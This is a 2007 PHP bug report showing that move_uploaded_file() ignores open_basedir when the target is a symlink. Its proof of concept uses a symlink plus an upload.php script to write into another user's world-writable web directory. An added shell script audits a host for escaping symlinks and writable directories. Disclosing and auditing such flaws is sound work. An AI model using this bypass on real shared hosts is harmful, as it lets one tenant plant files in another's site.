[2007-03-27 18:40 UTC] tony2001@php.net
[2007-03-27 19:59 UTC] vladimir at petrov dot ks dot ua
[2007-03-27 20:33 UTC] tony2001@php.net
[2007-03-27 21:19 UTC] vladimir at petrov dot ks dot ua
[2007-04-10 22:31 UTC] tony2001@php.net
Last updated: Sat Oct 25 22:00:01 2025 UTC
Description:
------------
A user can bypass the open_basedir restriction with move_uploaded_file() if the target file path is a symlink to any directory.

Reproduce code:
---------------
user1 will upload a file to user2's /home/user2/public_html folder.

We have in /etc/passwd:
user1:x:32001:32001::/home/user1:/bin/bash
user2:x:32002:32002::/home/user2:/bin/bash

The target folder is writable by anybody:
# ls -lA /home/user2
drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/

Apache has mod_php installed. Apache config for user1:
<VirtualHost xxx.xxx.xxx.xxx>
    ServerName user1.xxxxxxx.com
    DocumentRoot /home/user1/public_html
    User user1
    php_admin_value open_basedir "/home/user1"
</VirtualHost>

User user1 can do something like:
$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body>
<?
if ( isset($_FILES["userfile"]) ) {
    echo "Upload ";
    if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext"))
        echo "ok";
    else
        echo "failed";
}
?>
<form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data">
<input type="file" name="userfile">
<input type="submit">
</form>
</body></html>' > upload.php

Expected result:
----------------
If we access http://user1.xxxxxxx.com/upload.php, after the file upload the expected message is "Upload failed" and there is no file /home/user2/public_html/file.ext in the target folder.

Actual result:
--------------
If we access http://user1.xxxxxxx.com/upload.php, after the file upload we get the message "Upload ok" and the file /home/user2/public_html/file.ext exists in the target folder.
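
An audit that an administrator of such a shared host could run, as an added example that is not part of the original report: it lists the two preconditions the report relies on, a symlink inside one user's open_basedir tree that resolves outside it, and a world-writable directory in another user's home. The function names and the temporary demo tree are constructed for illustration; GNU `readlink -f` and `find` are assumed.

```shell
#!/bin/sh
# Added example, not from the bug report. Function names and the demo
# layout are constructed; GNU readlink -f and find are assumed.

# Print every symlink under base dir $1 that resolves outside it.
escaping_symlinks() {
    base=$(readlink -f "$1") || return 1
    find "$base" -type l | while IFS= read -r link; do
        target=$(readlink -f "$link") || continue   # unresolvable: skip
        case "$target/" in
            "$base"/*) ;;                           # stays inside the tree
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Print every directory under $1 that any local user can write to.
world_writable_dirs() {
    find "$1" -type d -perm -0002
}

# Build a constructed tree mirroring the report's two home directories.
build_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/user1/public_html" "$d/user2/public_html"
    chmod 755 "$d/user1" "$d/user1/public_html" "$d/user2"
    chmod 777 "$d/user2/public_html"
    ln -s "$d/user2/public_html" "$d/user1/public_html/user2_public_html"
    ln -s "$d/user1/public_html" "$d/user1/inside_link"   # harmless link
    printf '%s\n' "$d"
}

demo=$(build_demo_tree)
echo "Symlinks leaving user1's tree:"
escaping_symlinks "$demo/user1"
echo "World-writable directories in user2's tree:"
world_writable_dirs "$demo/user2"
rm -rf "$demo"
```

The trailing slash in the `case` comparison keeps a sibling such as `/home/user10` from being mistaken for a path inside `/home/user1`.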